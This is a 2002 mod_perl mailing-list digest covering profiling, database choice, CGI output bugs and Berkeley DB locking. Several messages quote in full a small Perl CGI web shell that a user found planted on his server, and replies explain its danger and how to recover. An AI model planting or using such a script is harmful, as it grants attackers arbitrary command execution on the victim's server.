Re: Off topic question a little worried
Chris Reinhardt wrote: On Thu, 21 Mar 2002, John Michael wrote: #!/usr/bin/perl use CGI qw(:standard); print header; my $k=param(g); my $a=param(s); if ($a || $k) { $l=`$k 21`; print start_form,textarea(g,$k,1,50); print submit(sc); print end_form; print pre($l); } print $ENV{SERVER_NAME}; It executes arbitrary commands as whatever your httpds run as. don't delete it, but add the -T flag #!/usr/bin/perl -T In addition for the hacker not being able to run anything and probably not understanding why, you will be able to check the logs to see what IP the script was called from and hopefully trace down the bugger. _ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
Re: Subroutines taking time to return..
Great feedback, many thanks. But as always, one problem becomes another ! I've compiled + installed Apache-DB I've compiled + installed DProf-19990108 I've added this to my httpd.conf: PerlModule Apache::DProf I've added this to my modperl.conf (called by httpd.conf): use Apache::DProf; use Apache::DB; Apache::DB-init; When Apache startsup I get: [notice] Apache::DB initialized in child 55178 All good and well I thought.. But erm.. nothing is being created in the dprof directory in the server-root. What am I doing wrong ? Regards
Re: Non-web use for Apache/mod_perl
Bas A.Schulte wrote: Hi, I've been meaning to write an article about how I used Apache/mod_perl to implement a mobile SMS application platform as it demonstrates use of Apache/mod_perl outside the Web realm, something I hadn't seen so far. Time constraints (as always) have prevented me from doing this properly, however, I'll try to give a short description of the system. The goal kinda is to see if others are using Apache/mod_perl in a similar way to share experiences, discuss issues that arise or discuss alternatives (I'd love someone to tell me I'm an idiot for handling all this lowlevel stuff myself and move to J2EE/java at once, if he can convince me I could have implemented this with the same budget and time frame). Very nice, Bas. Thanks for sharing with us. For J2EE in Perl see http://p5ee.perl.org/. Very early alpha though. For protocol server httpd-2.0/modperl-2.0 is exactly what you want, since it supports protocol servers and other useful things you will most likely benefit from (e.g. filtering), but don't hold your breath yet, since httpd-2.0 is not out yet. Though if you plan doing a next generation some time in the future, you probably better off start looking at modperl-2.0. We already have Eliza protocol example running as one of the tests: t/TEST -v protocol/eliza protocol/eliza1..6 ok 1 # send: Hello Eliza # recv: Hi. What seems to be your problem? ok 2 # send: How are you # recv: You're not really talking about me -- are you? ok 3 # send: Why do I have core dumped? # recv: That's quite interesting. ok 4 # send: I feel like writing some tests today, you? # recv: That is interesting. Please continue. ok 5 # send: good bye # recv: That is interesting. Please continue. ok 6 ok All tests successful. This is the client: http://cvs.apache.org/viewcvs.cgi/~checkout~/modperl-2.0/t/protocol/eliza.t This is the server: http://cvs.apache.org/viewcvs.cgi/~checkout~/modperl-2.0/t/protocol/TestProtocol/eliza.pm Also, can we adapt your story for our success stories collection? http://perl.apache.org/stories/ If so, can you please send me an adapted version, or I can simply throw it in as is :) _ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
Re: Non-web use for Apache/mod_perl
Bas A.Schulte wrote: Hi, I've been meaning to write an article about how I used Apache/mod_perl to implement a mobile SMS application platform as it demonstrates use of Apache/mod_perl outside the Web realm, something I hadn't seen so far. Time constraints (as always) have prevented me from doing this properly, however, I'll try to give a short description of the system. The goal kinda is to see if others are using Apache/mod_perl in a similar way to share experiences, discuss issues that arise or discuss alternatives (I'd love someone to tell me I'm an idiot for handling all this lowlevel stuff myself and move to J2EE/java at once, if he can convince me I could have implemented this with the same budget and time frame). [snip] I actually implemented a similar system, although it's not SMS specific. Basically, I have a central system in Apache/mod_perl. The eventual design is for full I/O in many protocols, including HTTP, SMTP, FTP and a handful of other protocols. So far the output is pretty much ready, and I think I'm going to wait for Apache 2 before I do the inputs. I _could_ write mod_perl handlers to understand other protocols, but Apache 2 is being designed around this, as far as I understand, so I'm going to do that around Apache 2 (as soon as I get off my ass and learn the new API :-)) Issac
Re: Subroutines taking time to return..
David Brown wrote: Great feedback, many thanks. But as always, one problem becomes another ! I've compiled + installed Apache-DB I've compiled + installed DProf-19990108 I've added this to my httpd.conf: PerlModule Apache::DProf I've added this to my modperl.conf (called by httpd.conf): use Apache::DProf; use Apache::DB; Apache::DB-init; When Apache startsup I get: [notice] Apache::DB initialized in child 55178 All good and well I thought.. But erm.. nothing is being created in the dprof directory in the server-root. What am I doing wrong ? You aren't doing it wrong. Next step is to run the script and usually it helps to read the docs :) http://thingy.kcilink.com/modperlguide/performance/Code_Profiling_Techniques.html _ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
Re: Non-web use for Apache/mod_perl
Issac, On Thursday, March 21, 2002, at 11:01 AM, Issac Goldstand wrote: Bas A.Schulte wrote: Hi, I've been meaning to write an article about how I used Apache/mod_perl to implement a mobile SMS application platform as it demonstrates use of Apache/mod_perl outside the Web realm, something I hadn't seen so far. Time constraints (as always) have prevented me from doing this properly, however, I'll try to give a short description of the system. The goal kinda is to see if others are using Apache/mod_perl in a similar way to share experiences, discuss issues that arise or discuss alternatives (I'd love someone to tell me I'm an idiot for handling all this lowlevel stuff myself and move to J2EE/java at once, if he can convince me I could have implemented this with the same budget and time frame). [snip] I actually implemented a similar system, although it's not SMS specific. Basically, I have a central system in Apache/mod_perl. The eventual design is for full I/O in many protocols, including HTTP, SMTP, FTP and a handful of other protocols. Well, this proves again that everything we software developers do has been done umteen times before ;) The system I described actually isn't tied to SMS as well; it has been designed with other devices in mind as well. The virtual SMSC component as I described it really should have a better name as it really is a protocal handler and serializing/deserializing component that is capable of handling other protocol and formats. In fact, I am considering enhancing it to be able to use it in a WAP or i-Mode context (if we can only find a way to get paid by the mobile subscriber using WAP which is easy with SMS). So far the output is pretty much ready, and I think I'm going to wait for Apache 2 before I do the inputs. I _could_ write mod_perl handlers to understand other protocols, but Apache 2 is being designed around this, as far as I understand, so I'm going to do that around Apache 2 (as soon as I get off my ass and learn the new API :-)) Yep; Apache 2 combined with mod_perl sure sounds interesting, now if it only had the stability that 1.x has ;) Regards, Bas.
Re: Non-web use for Apache/mod_perl
On Thu, 21 Mar 2002 00:40:24 +0100, Bas A.Schulte [EMAIL PROTECTED] said: BAS To handle a large number of concurrent transactions in a BAS transaction-safe environment without me having to worry too much about BAS concurrency issues and referential integrity I will slowly move to BAS Oracle. $dbh-do('LOCK TABLE USER, INSTANCE, APP_DATA') just plain BAS sucks unless you want to create a very large distributed *single-user* BAS system running on multiple machines. Without changing SQL backend you can have transactions with MySQL. Just use InnoDB table type. It is faster than default table type for read/write intensive applications because it doesn't lock whole tables but provides Oracle style row-level locking. -- oIlya Martynov = http://martynov.org/o oTIV.net = http://tiv.net/ o
Re: Subroutines taking time to return..
Thankyou, but I have read the documentation. Nothing gets written to a rootdir/dprof directory, not even an empty file when the scripts are run. You aren't doing it wrong. Next step is to run the script and usually it helps to read the docs :)
Re: Non-web use for Apache/mod_perl
Hi, On Thursday, March 21, 2002, at 11:39 AM, Ilya Martynov wrote: On Thu, 21 Mar 2002 00:40:24 +0100, Bas A.Schulte [EMAIL PROTECTED] said: BAS To handle a large number of concurrent transactions in a BAS transaction-safe environment without me having to worry too much about BAS concurrency issues and referential integrity I will slowly move to BAS Oracle. $dbh-do('LOCK TABLE USER, INSTANCE, APP_DATA') just plain BAS sucks unless you want to create a very large distributed *single-user* BAS system running on multiple machines. Without changing SQL backend you can have transactions with MySQL. Just use InnoDB table type. It is faster than default table type for read/write intensive applications because it doesn't lock whole tables but provides Oracle style row-level locking. I knew I shouldn't have mentioned MySQL and it's, possibly perceived, shortcomings ;) I know about InnoDB, I know about Postgresql too, it's just that I really like Oracle for lots of reasons. I have no personal experience with running MySQL or Postgresql in a high-volume concurrent read/write transaction situation. It seems most MySQL success stories are about websites with 98% read-only transactions on the database which just isn't similar to my needs. I used MySQL myself for that type of problem and it sure worked. If someone really wants to do another DB discussion, let's move that to a different discussion ;) Bas.
[OT] Return Receipts
I apologise striaght away for the completly off topic mail, but I'm desparate! I am having problems with return receipts from our users here at work. When someone requests a return receipt and I click okay, I get a Mailer-Daemon with the error: MAIL From:fransmaas.co.uk SIZE=2583 501 fransmaas.co.uk: domain missing or malformed For some reason it appears that the return receipt is not picking my email address as being the From: address and the mail server (Sun box, Solaris 2.6) is substituting the From: with From:fransmaas.co.uk When I have a look at the sendmail config (sendmail.cf) I can find: # handle from: special case R$*$* $ turn into magic token Has this got anything to do with the problem? Please be aware that my sendmail knowledge is very poor :( Thanks in advance for any help. Ewen
Re: Subroutines taking time to return..
David Brown wrote: Thankyou, but I have read the documentation. Nothing gets written to a rootdir/dprof directory, not even an empty file when the scripts are run. sorry, you should have told this :0) Could be write permissions? Can you profile a normal perl script? You aren't doing it wrong. Next step is to run the script and usually it helps to read the docs :) -- _ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
Re: [OT] Return Receipts
A quick fix might be to stick your from header in your script, when generating the email. fiq On Thu, 21 Mar 2002, Ewen Marshall wrote: I apologise striaght away for the completly off topic mail, but I'm desparate! I am having problems with return receipts from our users here at work. When someone requests a return receipt and I click okay, I get a Mailer-Daemon with the error: MAIL From:fransmaas.co.uk SIZE=2583 501 fransmaas.co.uk: domain missing or malformed For some reason it appears that the return receipt is not picking my email address as being the From: address and the mail server (Sun box, Solaris 2.6) is substituting the From: with From:fransmaas.co.uk When I have a look at the sendmail config (sendmail.cf) I can find: # handle from: special case R$*$* $ turn into magic token Has this got anything to do with the problem? Please be aware that my sendmail knowledge is very poor :( Thanks in advance for any help. Ewen
0 being appended to non mod_perl scripts.
Hello all, I apologize if this has already been answered elsewhere, I haven't been able to find it. I am encountering a wierd problem where perl scripts running under a normal cgi-bin (ie no mod_perl) have a '0' appended to the output. This does not happen to scripts run under mod_perl. It also only happens when PerlSendHeader is set to on. I thought that PerlSendHeader was a mod_perl only directive, but just to check I added PerlSendHeader off to the cgi-bin directory. That had no effect. Has anyone else encountered this and how did you fix it? Thanks in advanced, Mike Wille
Re: 0 being appended to non mod_perl scripts.
[reminder: keep replies CC'ed to the list! Thanks] Mike Wille wrote: Thanks for the suggestion, but I mentioned earlier that mod_perl is not running these scripts appended with a 0. Everything in cgi-bin which includes everything with a 0 appended is being run under mod_cgi. As I suggested remove all the configurations you have added, and just add a simply ScriptAlias and test. still having a problem? than it has nothing to do with mod_perl. Most likely you include some module that prints 0 in the END/DESTROY block or something like this. You didn't answer whether you have the same problem with the script I've suggested for you to run. If 0 doesn't appear with this 3 liner, see the item above, if the item above doesn't help see the 2nd item above. e.g. I don't see where is your ScriptAlias setting. You cannot run mod_cgi without setting ScriptAlias or using I'm sorry, I forgot to throw in the ScriptAlias with the config block I emailed earlier. I do indeed have a ScriptAlias set to: ScriptAlias /cgi-bin/ /home/www/cgi-bin/ cool _ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
modperl and SQL db select
hi, Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ From a licensing perspective which one is less risky if doing some work for a client? Noticed slashcode however the postgres port has stopped. AFAIK anyhow. Thought if practical I would do some coding to integrate Postgres if it is the right choice. If not MySQL? Just wanted to confirm that either is safe for a customer to use. They would not sell the program but they might sell the programs I write and the actual singular database. Basically I want to simply insert data into a .db and then produce HTML from the results and queries. The thought has crossed my mind to as well output the images as well from the .db What mod:perl modules should I seriously consider. Appreciate any pointers here as am just about to to begin the DBI:: stuff. TIA [EMAIL PROTECTED]
Re: modperl and SQL db select
Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]: Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ Take a look at URL:http://www.phpbuilder.com/columns/tim2705.php3, in which the author discusses why Sourceforge uses postgresql instead of MySQL. It's a little dated (the postgres version is 7.1, for example) but a fun read. (darren) -- We must respect the other fellow's religion, but only in the sense and to the extent that we respect his theory that his wife is beautiful and his children smart. -- H.L.Mencken
Re: modperl and SQL db select
darren chamberlain [EMAIL PROTECTED] writes: Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]: Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ Take a look at URL:http://www.phpbuilder.com/columns/tim2705.php3, in which the author discusses why Sourceforge uses postgresql instead of MySQL. It's a little dated (the postgres version is 7.1, for example) but a fun read. It's also been thoroughly rebutted ISTR :-) -- David Hodgkinson, Wizard for Hirehttp://www.davehodgkinson.com Editor-in-chief, The Highway Star http://www.deep-purple.com All the Purple Family Tree news http://www.slashrock.com Interim Technical Director, Web Architecture Consultant for hire
Re: modperl and SQL db select
Quoting Dave Hodgkinson [EMAIL PROTECTED] [Mar 21, 2002 13:25]: darren chamberlain [EMAIL PROTECTED] writes: Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]: Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ Take a look at URL:http://www.phpbuilder.com/columns/tim2705.php3, in which the author discusses why Sourceforge uses postgresql instead of MySQL. It's a little dated (the postgres version is 7.1, for example) but a fun read. It's also been thoroughly rebutted ISTR :-) I didn't say it was _accurate_, I said it was _fun_. :) (darren) -- There are two ways of constructing a software design. One way is to make it so simple that there are obviously no deficiencies. And the other way is to make it so complicated that there are no obvious deficiencies. -- C.A.R. Hoare
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
Perrin Harkins [EMAIL PROTECTED] writes: This sort of begs the question: why not use DB 3.x? Is there some new feature you need in DB 4? Anecdotaly, I believe the OpenLDAP and Cyrus projects have both found DB4 to be more reliable under load than DB3. Mike.
Re: Subroutines taking time to return..
David Brown wrote: All good and well I thought.. But erm.. nothing is being created in the dprof directory in the server-root. When you call the script, do you get segfaults in the error log? Make sure that you do the DProf stuff, including Apache::DB-init(), before you load any of your other modules. Otherwise, the debugging symbols don't get put into your code. - Perrin
Re: modperl and SQL db select
On March 21, 2002 10:37 am, darren chamberlain wrote: Quoting Dave Hodgkinson [EMAIL PROTECTED] [Mar 21, 2002 13:25]: darren chamberlain [EMAIL PROTECTED] writes: Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]: Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ Take a look at URL:http://www.phpbuilder.com/columns/tim2705.php3, in which the author discusses why Sourceforge uses postgresql instead of MySQL. It's a little dated (the postgres version is 7.1, for example) but a fun read. Note that a couple of his assertions in this document would be rather naive. The first one I noted was that he assumes that a high performance app has several joins. I think everyone here who's developed a few db apps will tell you that joins are hugely costly and should be avoided for an application's most common cases. I recoded a mysql/mod_perl web app with a couple of joins to a slightly but not horridly denormalized db structure and realized some huge performance gains. Further on, he was discussing threaded discussion forums and assumed a recursive query. While recursing the DATA is probably (though provabably not always) necessary, there is no need to storm the db with that many queries, since query setup time, queing, and results extraction have noticable time penalties. Extracting the data with a single query and recursing it in RAM is a much more db and cpu friendly idea. So is time dependent caching. How many inserts into a table per second do you expect? For your average discussion thing, maybe one new comment per minute. With a one minute cache on the db data, suddenly your speed limits are removed. Why would you need to requery the db if you don't expect it to change? This is the joy of mod_perl, being able to keep some context of your _application_ between hits of your _users_. As for performance, mysql and postgresql are getting pretty similar results, _these_ days. With aggressive app level caching of db data, and the innodb table handler, I was able to push mysql and mod_perl to 80+ 50kbyte page views per second on bog standard 650 mhz intel hardware. -- Jay yohimbe Thorne [EMAIL PROTECTED] Mgr Sys Tech, Userfriendly.org
Re: Subroutines taking time to return..
OK, I have it working now. I had to manually create the dprof directory in APACHEROOT/logs (I had expected it to be created), and then set the permissions such that apache (running as user: nobody) could write to it. Sorted. Thanks for your guidance guys. - Original Message - From: Perrin Harkins [EMAIL PROTECTED] To: David Brown [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Thursday, March 21, 2002 7:07 PM Subject: Re: Subroutines taking time to return.. David Brown wrote: All good and well I thought.. But erm.. nothing is being created in the dprof directory in the server-root. When you call the script, do you get segfaults in the error log? Make sure that you do the DProf stuff, including Apache::DB-init(), before you load any of your other modules. Otherwise, the debugging symbols don't get put into your code.
Re: modperl and SQL db select
Postgres: +More relational? So they say. More features perhaps. +stored procedures - ie. you can make query wrapping methods -pain the rear postgres user permissions to control. +been doing complex sql queries (subselects etc,) for longer. +Reminds me a lot of what I used to be able to do with oracle. +probably faster to set up ( than oracle ;) ). +every element of the database has a unique oid field which internally makes everything uniquely accessible by this field. +has all or nothing transaction support to avoid partially corrupting your data - it either completes the query(or group of queries) or it does'nt - useful when it's under heavy load or joe blogs comes along writes cr@p code and dependent writes updates to the live db, since he enjoys making changes to live, he doesn't know much sql and and he mispells update in the second query. Ooops. He's got a partially altered database and who knows what insanity this might cause for us. Or even manager blogs using odbc and doing the same there with his 'i'm a techie deep down' script. That was long! +Better under heavy load. +Clean shutdowns under heavy load. +psql has a cr@p command line. +better optimizer Mysql:+we all start with it. +Bench marks much faster. +/-Can allow nested queries (subselects again) though this is a relatively new feature. +People say it's less relational. Isn't really - but has fewer features (see above) +Doesn't have stored procedure support. +Think that I've read that it's indexing mechanism is not as good as postgres'. +probably easier to grasp if you haven't used it before +negate all of the above postgres points. -less reliable under heavy load. Images: Image::Magick - probably don't want the pictures themselves in the database, so much as pointers to their physical location and a means of pushing them in and out - use this for getting stats on them and manipulating thumbnails etc. My .02 EU Probably get flamed for being all wrong. But I'm not. So there!! :) Happy First Day of Spring, fiq On Thu, 21 Mar 2002, dreamwvr wrote: hi, Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ From a licensing perspective which one is less risky if doing some work for a client? Noticed slashcode however the postgres port has stopped. AFAIK anyhow. Thought if practical I would do some coding to integrate Postgres if it is the right choice. If not MySQL? Just wanted to confirm that either is safe for a customer to use. They would not sell the program but they might sell the programs I write and the actual singular database. Basically I want to simply insert data into a .db and then produce HTML from the results and queries. The thought has crossed my mind to as well output the images as well from the .db What mod:perl modules should I seriously consider. Appreciate any pointers here as am just about to to begin the DBI:: stuff. TIA [EMAIL PROTECTED]
Re: Off topic question a little worried
Any idea as to how it got on my server. It is owned by apache and in the apache group. That tells me that it was put on there by apache. It is in a directory that has the permissions 777 because the script that is normally in there keeps and writes traffic information, so I guess someone found a way to have apache write the file into that directory. But how did they get it to chmod 755? John michael On Thu, 21 Mar 2002, John Michael wrote: #!/usr/bin/perl use CGI qw(:standard); print header; my $k=param(g); my $a=param(s); if ($a || $k) { $l=`$k 21`; print start_form,textarea(g,$k,1,50); print submit(sc); print end_form; print pre($l); } print $ENV{SERVER_NAME}; It executes arbitrary commands as whatever your httpds run as. -- Chris Reinhardt [EMAIL PROTECTED] Systems Architect Dynamic DNS Network Services http://www.dyndns.org/
RE: 0 being appended to non mod_perl scripts.
There are a few scripts that use system calls (``). There are scripts that don't use system calls at all and still have the 0. None of them create any subprocesses. I checked to see if mod_perl was handling the scripts that sent the '0' but perl is indeed handling them and not httpd. For testing this problem I have a standard setup: Directory /home/www/cgi-bin AllowOverride None Options None Order allow,deny Allow from all Options +ExecCGI /Directory The mod_perl script directory: Directory /home/www/perl SetHandler perl-script PerlHandler Apache::Registry Options +ExecCGI PerlSendHeader on PerlModule Apache::DBI Apache::StatINC AllowOverride All /Directory The server is running Apache 1.3.20. I'm not sure how to find the version of mod_perl... Nothing looks out of wack does it? Anything running in cgi-bin has a '0' appended to it and is exceuted by perl. Anything in perl does not have the '0' and is executed by httpd. - Mike -Original Message- From: darren chamberlain [mailto:[EMAIL PROTECTED]] Sent: Thursday, March 21, 2002 11:49 AM To: [EMAIL PROTECTED] Subject: Re: 0 being appended to non mod_perl scripts. Quoting Mike Wille [EMAIL PROTECTED] [Mar 21, 2002 11:36]: I apologize if this has already been answered elsewhere, I haven't been able to find it. I am encountering a wierd problem where perl scripts running under a normal cgi-bin (ie no mod_perl) have a '0' appended to the output. This does not happen to scripts run under mod_perl. It also only happens when PerlSendHeader is set to on. I thought that PerlSendHeader was a mod_perl only directive, but just to check I added PerlSendHeader off to the cgi-bin directory. That had no effect. Has anyone else encountered this and how did you fix it? This looks like an exit code to me. Does the script create subprocesses or use system? Also, if PerlSendHeader is making the script behave differently, it sounds like mod_perl is handling your script (you can check for $ENV{MOD_PERL}). (darren) -- People who are willing to give up freedom for the sake of short term security, deserve neither freedom nor security. -- Ben Franklin
RE: 0 being appended to non mod_perl scripts.
Hi there, On Thu, 21 Mar 2002, Mike Wille wrote: [snip,snip] I checked to see if mod_perl was handling the scripts that sent the '0' but perl is indeed handling them and not httpd. I'm not sure I understand what you're saying here. The server is running Apache 1.3.20. I'm not sure how to find the version of mod_perl... Does this mean you'vve *never* looked in the error_log??? 73, Ged.
Re: Off topic question a little worried
John Michael wrote: Any idea as to how it got on my server. Someone found a serious security hole in something you're running. You have to assume that your server has been completely compromised and that the entire world now has root access to it through a hundred backdoors they installed. Take it off-line now, before you find out it sent millions of porn spam messages. You can study it later to try and find the problem. - Perrin
Re: 0 being appended to non mod_perl scripts.
Mike Wille wrote: There are a few scripts that use system calls (``). There are scripts that don't use system calls at all and still have the 0. None of them create any subprocesses. I checked to see if mod_perl was handling the scripts that sent the '0' but perl is indeed handling them and not httpd. As Darren has suggested please try this script: #!/usr/bin/perl -wT print Content-type: text/plain\n\n; print Running under ; print $ENV{MOD_PERL} ? mod_perl : mod_cgi; and if you get mod_perl, and you don't know to figure out why, start from scratch, remove all configs you have added to the default httpd.conf and then start adding one by one and see what you are doing wrong. e.g. I don't see where is your ScriptAlias setting. You cannot run mod_cgi without setting ScriptAlias or using SetHandler default-handler for example see: http://perl.apache.org/guide/config.html#Overriding_Location_Setting_in and the rest of the chapter For testing this problem I have a standard setup: Directory /home/www/cgi-bin AllowOverride None Options None Order allow,deny Allow from all Options +ExecCGI /Directory The mod_perl script directory: Directory /home/www/perl SetHandler perl-script PerlHandler Apache::Registry Options +ExecCGI PerlSendHeader on PerlModule Apache::DBI Apache::StatINC AllowOverride All /Directory The server is running Apache 1.3.20. I'm not sure how to find the version of mod_perl... Nothing looks out of wack does it? Anything running in cgi-bin has a '0' appended to it and is exceuted by perl. Anything in perl does not have the '0' and is executed by httpd. - Mike -Original Message- From: darren chamberlain [mailto:[EMAIL PROTECTED]] Sent: Thursday, March 21, 2002 11:49 AM To: [EMAIL PROTECTED] Subject: Re: 0 being appended to non mod_perl scripts. Quoting Mike Wille [EMAIL PROTECTED] [Mar 21, 2002 11:36]: I apologize if this has already been answered elsewhere, I haven't been able to find it. I am encountering a wierd problem where perl scripts running under a normal cgi-bin (ie no mod_perl) have a '0' appended to the output. This does not happen to scripts run under mod_perl. It also only happens when PerlSendHeader is set to on. I thought that PerlSendHeader was a mod_perl only directive, but just to check I added PerlSendHeader off to the cgi-bin directory. That had no effect. Has anyone else encountered this and how did you fix it? This looks like an exit code to me. Does the script create subprocesses or use system? Also, if PerlSendHeader is making the script behave differently, it sounds like mod_perl is handling your script (you can check for $ENV{MOD_PERL}). (darren) -- People who are willing to give up freedom for the sake of short term security, deserve neither freedom nor security. -- Ben Franklin -- _ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
Re: [OT] Off topic question a little worried
This link offers some general guidelines for recovering from a compromised server: http://www.cert.org/tech_tips/win-UNIX-system_compromise.html Hope it helps, and good luck. Wes Perrin Harkins [EMAIL PROTECTED] on 03/21/2002 03:42:55 PM To: John Michael [EMAIL PROTECTED] cc: [EMAIL PROTECTED] (bcc: Wesley Sheldahl/Lex/Lexmark) Subject: Re: Off topic question a little worried John Michael wrote: Any idea as to how it got on my server. Someone found a serious security hole in something you're running. You have to assume that your server has been completely compromised and that the entire world now has root access to it through a hundred backdoors they installed. Take it off-line now, before you find out it sent millions of porn spam messages. You can study it later to try and find the problem. - Perrin
Re: modperl and SQL db select
On Thu, 21 Mar 2002, Jay Thorne wrote: The first one I noted was that he assumes that a high performance app has several joins. I think everyone here who's developed a few db apps will tell you that joins are hugely costly and should be avoided for an application's most common cases. Actually, I've developed _more_ than a few DB apps and I'd tell you that joins are not only _not_ hugely costly, but can sometimes be a performance improvement. It really depends on a lot of factors including what RDBMS you are using, how many connections you have, ratio of reads to writes, how complicated the joins are. But a blanket statement like that is flat out wrong. I recoded a mysql/mod_perl web app with a couple of joins to a slightly but not horridly denormalized db structure and realized some huge performance gains. You removed denormalization, thereby increasing the amount of work necessary to maintain data integrity so the reads may be faster but the writes are definitely slower and more prone to screwing things up. Even worse, you denormalized in favor of _one_ app, obviously, which means any new app you write on top of this denormalized db in the future may suffer because the denormalization doesn't serve it well. Further on, he was discussing threaded discussion forums and assumed a recursive query. While recursing the DATA is probably (though provabably not always) necessary, there is no need to storm the db with that many queries, since query setup time, queing, and results extraction have noticable time penalties. Extracting the data with a single query and recursing it in RAM is a much more db and cpu friendly idea. This I can agree on, though it is more a limitation of SQL, which provides no meaningful way to do a recursive query. As for performance, mysql and postgresql are getting pretty similar results, _these_ days. With aggressive app level caching of db data, and the innodb table handler, I was able to push mysql and mod_perl to 80+ 50kbyte page views per second on bog standard 650 mhz intel hardware. Again, that will depend on a number of things including complexity of your queries and ratio of reads vs. writes, etc. It's worth noting that MySQL's query optimizer pretty much stinks and will often not use indexes because it simply gives up when queries have an 'OR' in them, for example. What it comes down to is that except for _extremely_ demanding applications, either one is likely to be perfectly suitable so pick the one that you like best, or that has the features you need, or that your sysadmins can support most easily, or whatever. -dave /*== www.urth.org we await the New Sun ==*/
Re: Subroutines taking time to return..
Hi there, On Thu, 21 Mar 2002, Perrin Harkins wrote: When you call the script, do you get segfaults in the error log? Coming into this thread a little late, so sorry if you already said, what version of Perl are you using? I had problems with Devel::Dprof and dprofpp on 5.7.1 which were fixed by upgrading to 5.7.2 although Dprof itself didn't change at all. 73, Ged.
Berkeley DB 4.0.14 not releasing lockers under mod_perl
Hello, I have run into a problem specific to Berkeley 4.0.14 that I hope you can help me to diagnose. There are enough other products involved that I'm not sure if it's DB's fault or mod_perl's. Here's the setup: Linux 7.2 i386 perl 5.6.1 apache 1.3.19 with mod_perl 1.25 DB 4.0.14 BerkeleyDB 0.18 I'm testing with the Perl script below, with the filename ending .mperl (which, in my configuration, causes it to run as a mod_perl registry script). The problem: Under DB 4.0.14, five lockers get allocated, one during each iteration of the loop. The test program will show Current number of lockers and Maximum number of lockers so far both to be 5. In a production environment, this behavior eventually leads to an error, because the maximum number of lockers is reached. If I either use DB 3.x or even run this from the commandline (bypassing mod_perl) under DB 4 the problem goes away: only one locker is allocated per loop, and therefore the total number used does not increase unexpectedly. I have already contacted Sleepycat (the makers of DB), but they cannot help much, since their experience with mod_perl is limited. - TEST SCRIPT - #!/usr/bin/perl use strict; use BerkeleyDB qw( DB_CREATE DB_INIT_MPOOL DB_INIT_CDB ); # Change me to something appropriate for your system my $dir='/home/httpd/some/directory'; system( rm $dir/__db* $dir/TESTdb ); foreach( 1..5 ) { my $env = open_env($dir); my %hash; my $db = open_db( TESTdb, \%hash, $env ); untie %hash; undef $db; undef $env; } print HTTP/1.1 200\nContent-type: text/plain\n\n; print `db_stat -c -h $dir`; print \n; sub open_env { my $env = new BerkeleyDB::Env( -Flags=DB_INIT_MPOOL|DB_INIT_CDB|DB_CREATE, -Home= $_[0], ); die Could not create env: $! .$BerkeleyDB::Error. \n if !$env; return $env; } sub open_db { my( $file, $Rhash, $env ) = @_; my $db_key = tie( %{$Rhash}, 'BerkeleyDB::Btree', -Flags=DB_CREATE, -Filename=$file, -Env=$env ); die Can't open $file: $! .$BerkeleyDB::Error.\n if !$db_key; return $db_key; } Dan Wilga [EMAIL PROTECTED] Web Technology Specialist http://www.mtholyoke.edu Mount Holyoke CollegeTel: 413-538-3027 South Hadley, MA 01075 I have a bold and cunning plan - Baldric
Re: Subroutines taking time to return..
Hi again, On Thu, 21 Mar 2002, David Brown wrote: OK, I have it working now. Guess I shold read ALL my mail before replying to any of it... 73, Ged.
Re: modperl and SQL db select
On Thu, 21 Mar 2002, Rafiq Ismail (ADMIN) wrote: Mysql:+we all start with it. +Bench marks much faster. +/-Can allow nested queries (subselects again) though this is a relatively new feature. Eh? Subselects aren't scheduled for implementation until 4.1. The current version is 4.0.2. +People say it's less relational. Isn't really - but has fewer features (see above) I'm not sure what less relational means. -less reliable under heavy load. I'm not sure where you get that from either. MySQL is used under some very heavy loads (read the MySQL users list). Wow, this thread is really bringing out the fiction! /*== www.urth.org we await the New Sun ==*/
Re: Off topic question a little worried
